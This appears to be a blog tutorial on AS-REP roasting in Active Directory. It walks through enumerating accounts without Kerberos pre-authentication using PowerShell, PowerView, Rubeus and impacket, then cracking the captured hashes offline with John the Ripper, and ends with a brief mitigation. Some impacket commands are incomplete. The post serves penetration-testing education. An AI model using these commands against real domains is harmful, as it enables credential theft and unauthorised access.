Kerberos attacks 2-AS-REP Roasting

2 minute read

AS-REP roasting

  • If an Active Directory user has pre-authentication disabled, a vulnerability is exposed which can allow an attacker to perform an offline bruteforce attack against that user’s password.
  • This attack is commonly known as AS-REP Roasting in reference to Authentication Service Requests, a part of the process of authentication with Kerberos.
  • An attacker who is able to find a user with pre-authentication disabled can request an AS-REP ticket for that user and this will contain data encrypted with the user’s password.
  • Timestamp encrypted with the NTLM hash of user and sent to the KDC (AS-req) which is the Pre-Auth data.
  • (Only valid user can use the timestamp) If Pre-Auth is not enabled. we can grab the encrypted part from AS-REP and brute-force it offline


AS-REP roasting attack consists of the following steps

  • 1-Obtain access to a domain as an authenticated user.
  • 2-Use an LDAP filter or tools like PowerView’s Get-DomainUser feature to crawl the domain and identify user accounts with the Do not require Kerberos preauthentication Property enabled.
  • 3-Identify target account or accounts.
  • 4-Request a Kerberos (TGT) from the KDC in the name of a target account. The KDC will respond with the TGT for the account, without requiring the account password as a pre-authentication.
  • 5-Using a tool like Wireshark, extract the user’s password hash from the AS-REP packet. It can be found in the enc-part section of the packet.
  • 6-Use a tool like HashCat or John the Ripper to extract a plaintext password from the captured hash.


KDC: Key Distribution Center # The trusted 3rd party / the Domain Controller
TGS: Ticket Granting Server  # A subset function of the KDC which issues service tickets
TGT: Ticket Granting Ticket  # A userbased ticket used to authenticate to the KDC
ST: Service Ticket           # Used to authenticate against services
SPN: Service Principal Name  #The name of a service on the network

enumerate User account with Do not require pre-authentication

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name


Import-Module .\powerview.ps1
Get-DomainUser -PreauthNotRequired -verbose| select name


ASREP Roasting with Rubeus

Rubeus.exe asreproast


saved the extracted hash in the john crackable format inside a text file

Rubeus.exe asreproast /format:john /outfile:hash.txt


ASREP Roasting with

I used GetNPUsers from impacket collection from a remote machine

Get Domain User

Import-Module .\powerview.ps1
Get-DomainUser | select name


saved users in the text file


If a user does exist with preauthentication disabled, you will get the hash

python3 -usersfile  users.txt -dc-ip


python3 -dc-ip


crack hash with john

john tgt.txt -w=/usr/share/wordlists/rockyou.txt


AS-REP roasting Mitigation

  • ensure that no users within the Active Directory domain have Pre-authentication disabled (it is enabled by default).

I finished part 2 in Kerberos attacks today waite me in the next part.